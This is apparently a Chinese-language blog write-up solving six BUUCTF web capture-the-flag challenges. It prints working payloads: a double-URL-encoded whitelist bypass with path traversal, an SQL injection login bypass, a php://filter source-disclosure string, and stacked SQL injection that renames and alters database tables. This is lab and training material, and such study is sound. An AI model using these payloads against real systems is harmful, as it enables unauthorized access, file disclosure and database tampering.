[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)

[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)

文章目录

  • [CTF从0到1学习] BUUCTF WEB部分 wp(待完善)
    • [HCTF 2018]WarmUp
    • [极客大挑战 2019]EasySQL
    • [极客大挑战 2019]Havefun
    • [ACTF2020 新生赛]Include
    • [强网杯 2019]随便注
    • [SUCTF 2019]EasySQL

[HCTF 2018]WarmUp

[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第1张图片
首先看看网页源码呗

[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第2张图片

 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
        	//定义了一个数组
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            // 判断,变量是否为空,是否不是字符串
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }
			// 如果参数存在于数组中,返回true
            if (in_array($page, $whitelist)) {
                return true;
            }
			// mb_substr是截取函数,从0到?
            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            // 如果变量在数组中,返回true
            if (in_array($_page, $whitelist)) {
                return true;
            }
			// 先进行url解码,然后截取字符,如果变量在数组中没返回true
            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "
"
; } ?> 可以看到函数代码中有四个if语句 第一个if语句对变量进行检验,要求$page为字符串,否则返回false 第二个if语句判断$page是否存在于$whitelist数组中,存在则返回true 第三个if语句判断截取后的$page是否存在于$whitelist数组中,截取$page'?'前部分,存在则返回true 第四个if语句判断url解码并截取后的$page是否存在于$whitelist中,存在则返回true 若以上四个if语句均未返回值,则返回false 有三个if语句可以返回true,第二个语句直接判断$page,不可用 第三个语句截取'?'前部分,由于?被后部分被解析为get方式提交的参数,也不可利用 第四个if语句中,先进行url解码再截取,因此我们可以将?经过两次url编码,在服务器端提取参数时解码一次,checkFile函数中解码一次,仍会解码为'?',仍可通过第四个if语句校验。('?'两次编码值为'%253f',构造url: 所以我们的payload 就是 file=source.php?file=source.php%253f../../../../../ffffllllaaaagggg

[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第3张图片
[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第4张图片

成功拿到flag
[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第5张图片

[极客大挑战 2019]EasySQL

[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第6张图片
这种就是抓抓包了,发现有单引号报错
[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第7张图片
那就是典型的万能密码了

payload:/check.php?username=admin'%20or%201=1%23&password=123

[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第8张图片

[极客大挑战 2019]Havefun

[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第9张图片
先看网页源代码吧
[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第10张图片
试了试cat=dog居然解出flag了。可能是那种签到题吧

[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第11张图片

[ACTF2020 新生赛]Include

[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第12张图片
首先题目是include,所以会往文件包含去想
[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第13张图片
尝试使用php://filter伪协议
payload:?file=php://filter/read=convert.base64-encode/resource=flag.php

[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第14张图片
base64解码得
在这里插入图片描述

[强网杯 2019]随便注

[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第15张图片
看一眼源码
[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第16张图片

单引号报错,找到注入点
[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第17张图片
union select 进行测试
[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第18张图片
然后就想到了堆叠注入,别问我怎么知道的。我被深育杯第一个虐惨了!!!

[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第19张图片

好像也就ctftraining这一个有用呗

然后看看表
[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第20张图片
然后看看两张表的结构
[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第21张图片
[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第22张图片
那么可以猜测我们提交查询的窗口就是在这个表里查询数据的

  1. 那么查询语句很有可能是 : selsect id,data from words where id =

因为可以堆叠查询,这时候就想到了一个改名的方法,把words随便改成words1,然后把1919810931114514改成words,再把列名flag改成id,结合上面的1’ or 1=1#爆出表所有内容就可以查flag啦

1';rename words to words1;rename `1919810931114514` to words;alter table flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc  words;#

再用一下一开始的操作id=1’ or 1=1#

[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第23张图片
https://www.cnblogs.com/wjw-zm/p/12359735.html

[SUCTF 2019]EasySQL

[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第24张图片

[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第25张图片
在这里插入图片描述
感觉没有过滤
[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第26张图片

select都可以用

这道题目需要我们去对后端语句进行猜测

1、输入非零数字得到的回显1和输入其余字符得不到回显=>来判断出内部的查询语句可能存在有||

2、也就是select 输入的数据||内置的一个列名 from 表名=>即为

select post进去的数据||flag from Flag(含有数据的表名,通过堆叠注入可知)

此时的||起到的作用是or的作用

内置的sql语句为

sql=“select”.post[‘query’]."||flag from Flag";

如果$post[‘query’]的数据为*,1,sql语句就变成了

select *,1||flag from Flag

也就是

select *,1 from Flag

也就是直接查询出了Flag表中的所有内容
[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第27张图片

你可能感兴趣的:(CTF,wp,CTF)